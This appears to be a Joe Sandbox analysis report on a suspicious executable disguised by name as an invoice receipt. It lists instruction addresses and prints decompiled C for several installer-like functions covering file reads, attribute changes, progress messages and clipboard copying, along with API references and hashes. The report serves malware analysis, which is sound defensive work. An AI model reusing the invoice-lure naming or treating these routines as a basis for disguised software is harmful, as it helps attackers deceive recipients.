0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405760
0x0040576d
0x00405782
0x00405788

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,80000000,00000003), ref: 00405760
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405741
0x0040574a
0x00000000
0x00405753
0x00405759

APIs

GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031ac
0x004031bf
0x004031c7
0x00000000
0x004031ce
0x00000000
0x004031d0

APIs

ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004031e8
0x004031ee

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420498;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404f6a
0x00404f70
0x00404f79
0x00404f7c
0x00405114
0x00405138
0x00405138
0x0040514b
0x00405169
0x00405170
0x004051c7
0x004051cb
0x00000000
0x004051d2
0x004051da
0x004051e2
0x004051e5
0x004052de
0x00000000
0x004052de
0x004051f4
0x00405200
0x00405206
0x0040520c
0x00405221
0x00405227
0x0040520e
0x00405213
0x00405219
0x0040521c
0x0040521c
0x00405237
0x0040523f
0x00405242
0x0040524b
0x0040524e
0x00405255
0x0040525c
0x00405264
0x00405264
0x0040527b
0x0040527b
0x00405282
0x00405288
0x00405291
0x00405298
0x004052a1
0x004052a3
0x004052a6
0x004052b5
0x004052b7
0x004052bd
0x004052be
0x004052bf
0x004052c7
0x004052d2
0x004052d8
0x004052d8
0x00000000
0x00405242
0x004051cb
0x00405178
0x004051a8
0x004051b0
0x004051b2
0x004051bb
0x004051bb
0x004051c2
0x00000000
0x004051c2
0x0040517c
0x00405186
0x00000000
0x0040514d
0x00405153
0x0040518b
0x00000000
0x00405194
0x0040515c
0x00405161
0x00405164
0x00000000
0x00405164
0x0040514b
0x00404f82
0x00404f86
0x00404f8f
0x00404f96
0x00404f99
0x00404f9c
0x00404f9f
0x00404fa0
0x00404fa1
0x00404fba
0x00404fbd
0x00404fc7
0x00404fd6
0x00404fde
0x00404fe6
0x00404feb
0x00404fee
0x00404ffa
0x00405003
0x0040500c
0x0040502f
0x00405035
0x00405046
0x0040504b
0x00405059
0x00405067
0x00405067
0x0040506c
0x0040507a
0x0040507a
0x0040507f
0x00405082
0x00405087
0x00405093
0x0040509c
0x004050a9
0x004050b8
0x004050ab
0x004050b0
0x004050b0
0x004050c4
0x004050c4
0x004050d8
0x004050e1
0x004050ea
